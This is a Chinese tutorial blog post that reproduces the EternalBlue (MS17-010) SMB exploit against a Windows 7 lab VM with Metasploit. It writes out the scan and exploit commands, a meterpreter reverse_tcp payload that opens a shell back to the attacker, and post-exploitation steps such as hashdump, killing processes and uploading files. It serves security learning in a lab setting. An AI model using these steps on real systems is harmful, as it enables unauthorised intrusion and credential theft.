win7系统smb永恒之蓝【漏洞复现】

这篇具有很好参考价值的文章主要介绍了win7系统smb永恒之蓝【漏洞复现】。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

介绍

永恒之蓝(Eternal Blue)是一种利用windows的系统的SMB协议漏洞来获取系统最高权限,从而达到入侵计算机目地的漏洞,于2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布,5月12日被不法分子改造成了wanna cry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。
(备注:大家不要随意在网上下载使用wanna cry勒索病毒)

测试环境靶机以及渗透工具

Vmware Workstation(虚拟机):

kali:Metasploit(msf)    ip:192.168.1.139

windows7                           ip:192.168.1.222

(注意:必须在同一个网段下)

win7系统smb永恒之蓝【漏洞复现】

 win7系统smb永恒之蓝【漏洞复现】

 两个系统一定要相互ping通

win7系统smb永恒之蓝【漏洞复现】

 win7系统smb永恒之蓝【漏洞复现】

 ping不通的话你就别玩了~~

进入msf控制台:输入msfconsole +回车

win7系统smb永恒之蓝【漏洞复现】

注意: 图案不一样不要紧,每次的图案都是随机的

可以先search ms17-010 查找一下漏洞 ms17-010是漏洞编号,画横线的地方不用管

win7系统smb永恒之蓝【漏洞复现】

 可以先使用smb漏洞扫描一下此ip地址是否有ms17-010漏洞

msf6  > use auxiliary/scanner/smb/smb_ms17_010  #扫描是否存在smb_ms17-010漏洞

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.222  #设置目标主机
rhosts => 192.168.1.222

msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit     #运行  表示存在漏洞

[+] 192.168.1.222:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.222:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp

检测到存在,继续下一步

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue  
#进入windows漏洞利用模块下面ms17

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options   #查看需要配置什么

win7系统smb永恒之蓝【漏洞复现】

 配置RHOSTS (这是目标主机地址)LHOST(本机地址)LPORT(本机地址监听端口)

其他都是默认的,这三个都得配,如果还想了解更多,请翻译后面的英文

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.222
#这里大小写无所谓,最好大写,配置目标主机地址
rhosts => 192.168.1.222

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.139
lhost => 192.168.1.139

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
#端口只要在65535以内并且需要空闲端口,即可设置
lport => 4444

设置一个payload

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

此设置用于逆向拿shell,这里设置了一个tcp协议 

一切准备就绪>>>>>>>>>>>>>>>>>>>>>>>>

exploit  运行

win7系统smb永恒之蓝【漏洞复现】

只要不报错基本就成功了

这里可以 hashdump一下  查看系统用户

win7系统smb永恒之蓝【漏洞复现】

可以看到两个用户(Administrator、Guest)并且密码一致(这里的密码是指加密后的)

win7系统smb永恒之蓝【漏洞复现】

ps可查看系统进程,可以随便kill杀掉

可以从kali上上传一些文件并运行

 (备注:想破坏他人计算机系统的再次提醒!本文章只用作技术交流及讨论!请遵纪守法!)文章来源地址https://www.toymoban.com/news/detail-467633.html

到了这里,关于win7系统smb永恒之蓝【漏洞复现】的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 漏洞复现-永恒之蓝(MS17-010)

    目录 一,漏洞介绍 1,永恒之蓝是什么? 2,漏洞原理 3,影响版本 二,实验环境 三,漏洞复现 四,利用exploit模块进行渗透          永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”

    2024年02月13日
    浏览(73)
  • ms17-010(永恒之蓝)漏洞复现

    目录 前言 一、了解渗透测试流程  二、使用nmap工具对win7进行扫描 三、尝试ms17-010漏洞利用 四、结果展示 总结 🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。 💡本文由Filotimo__✍️原创,首发于CSDN📚。 📣如需转载,请事先与我联系以获得授

    2024年02月09日
    浏览(37)
  • 永恒之蓝(MS17-010)漏洞复现

    目录 漏洞简介 漏洞描述 影响版本 复现环境 攻击机 IP:192.168.109.132 靶机 IP:192.168.109.130 开启远程设置 卸载全部安全补丁 复现过程 一、主机发现 二、打开metasploit工具 三、使用msf搜寻MS17-010漏洞 四、使用MS17-010扫描模块,对靶机进行扫描 1.使用扫描模块 2.查看模块需要配置

    2024年02月13日
    浏览(47)
  • Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 提示:这里可以添加本文要记录的大概内容: 我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。 提示:以下是本篇文章正文内容,下面

    2024年02月06日
    浏览(37)
  • 永恒之蓝(ms17-010)借助kali进行攻击win7实验报告

    学习kali和了解病毒永恒之蓝(ms17-010) 1.搭建环境win7 和 kali,两台虚拟机需要处于同一内网(这里我使用的网络适配器都是NAT模式) 2.确保两台虚拟机在同一内网 win7和kali 3.使用kali ,打开终端,输入msfconsole(渗透测试工具) 4.对永恒之蓝(ms17-010) 进行搜索 auxiliary(辅助

    2024年02月12日
    浏览(32)
  • 永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 环境 信息收集 先扫描目标靶机IP 进入MSF查看是否存在永恒之蓝的漏洞 攻击 攻击机:kali 靶机:Windows Server 2008 对ip进行收集开放什么端口 先扫描目标靶机IP 因为在同一个内网之中 所以可以使用arp-scan -l 进行查询 知道目标靶机IP(192.168.162.146)来进

    2024年03月25日
    浏览(51)
  • 【ms17-010】永恒之蓝漏洞复现

    准备工作 攻击机:kali,ip:192.168.56.128 靶机:windows server 2003,ip:192.168.56.132 工具:nmap(扫描)、msf 漏洞利用 首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况 此时已经扫描出来了,ip为: 192.168.56.132 的主机开启,并且显示了开放的端口号。 然后我们可以使用:

    2024年01月19日
    浏览(40)
  • 永恒之蓝ms17_010漏洞复现

    攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)   登录 kali linux,用 nmap 探测本网段存活主机 nmap 192.168.5

    2024年02月11日
    浏览(38)
  • 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。而SMB服务是一个协议名,它能被用于Web连接和客户端与服

    2024年02月06日
    浏览(86)
  • ms17-010(永恒之蓝) 漏洞复现与处理

    ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入

    2024年02月09日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包